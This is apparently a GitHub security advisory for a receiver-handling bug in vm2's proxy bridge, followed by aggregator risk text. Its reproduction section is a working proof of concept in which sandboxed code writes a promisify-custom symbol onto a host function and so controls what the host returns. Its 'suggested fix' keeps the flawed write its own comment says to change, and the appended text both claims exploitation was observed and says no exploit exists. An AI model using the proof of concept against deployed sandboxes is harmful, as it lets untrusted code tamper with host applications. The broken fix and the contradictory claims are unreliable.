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GHSA-c4cf-2hgv-2qv6
Summary
The BaseHandler.set trap in bridge.js (line 1231) ignores the receiver parameter and unconditionally writes to the host target object. Per the Proxy set trap specification, when receiver !== proxy (e.g., when a child object inherits from the proxy via Object.create), the property assignment should create an own property on the receiver, not on the proxy target. The current implementation always calls otherReflectSet(object, key, value) against the host target, causing all inherited property writes to leak through to the host object.
This bug provides an alternative attack vector for writing dangerous cross-realm Symbol keys (e.g., nodejs.util.promisify.custom) to host objects, bypassing any future per-trap isDangerousCrossRealmSymbol guard on the direct set path.
Vulnerable Code
// bridge.js:1231-1260
set(target, key, value, receiver) {
validateHandlerTarget(this, target);
const object = getHandlerObject(this);
if (isProtectedHostObject(object)) throw new VMError(OPNA);
// ...
try {
value = otherFromThis(value);
return otherReflectSet(object, key, value) === true;
// BUG: 'receiver' is never used.
// Should check if receiver !== proxy and handle accordingly.
} catch (e) {
throw thisFromOtherForThrow(e);
}
}
Impact
Sandbox code can write arbitrary properties (including dangerous Symbol-keyed properties) to any host object it holds a reference to, by creating a prototype-inheriting child:
// Sandbox code
const child = Object.create(hostObj);
child.injectedProp = 'attacker-value';
// hostObj now has 'injectedProp' on the HOST side
Combined with the Symbol.for coverage gap, this enables semantic confusion attacks:
const kCustom = Symbol.for('nodejs.util.promisify.custom');
const child = Object.create(hostFunction);
child[kCustom] = function() {
return Promise.resolve('attacker-controlled');
};
// Host: util.promisify(hostFunction)() returns 'attacker-controlled'
Reproduction
const { VM } = require('vm2');
const util = require('util');
const vm = new VM();
const hostFn = function api(cb) { cb(null, 'ok'); };
vm.setGlobal('hostFn', hostFn);
vm.run(`
const kCustom = Symbol.for('nodejs.util.promisify.custom');
const child = Object.create(hostFn);
child[kCustom] = function() {
return Promise.resolve('EXPLOITED-VIA-RECEIVER-BUG');
};
`);
// Host side
const promisified = util.promisify(hostFn);
promisified('test').then(r => console.log(r));
// Output: EXPLOITED-VIA-RECEIVER-BUG
Suggested Fix
set(target, key, value, receiver) {
validateHandlerTarget(this, target);
const object = getHandlerObject(this);
if (isProtectedHostObject(object)) throw new VMError(OPNA);
if (isDangerousCrossRealmSymbol(key)) throw new VMError(OPNA);
if (key === '__proto__' && !thisOtherHasOwnProperty(object, key)) {
return this.setPrototypeOf(target, value);
}
if (key === 'constructor' && thisArrayIsArray(object)) {
thisReflectSet(target, key, value);
return true;
}
try {
value = otherFromThis(value);
// When receiver is not the proxy itself, set on receiver (this-realm)
// instead of the host target to preserve prototype-chain semantics.
return otherReflectSet(object, key, value) === true;
} catch (e) {
throw thisFromOtherForThrow(e);
}
}
The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The vulnerability can affect other systems as well, not just the initial system. There is a high impact on the integrity of the data.
Exploitation activity has been observed. Apply available patches or mitigations urgently.
Probability that this vulnerability will be exploited in the wild within the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
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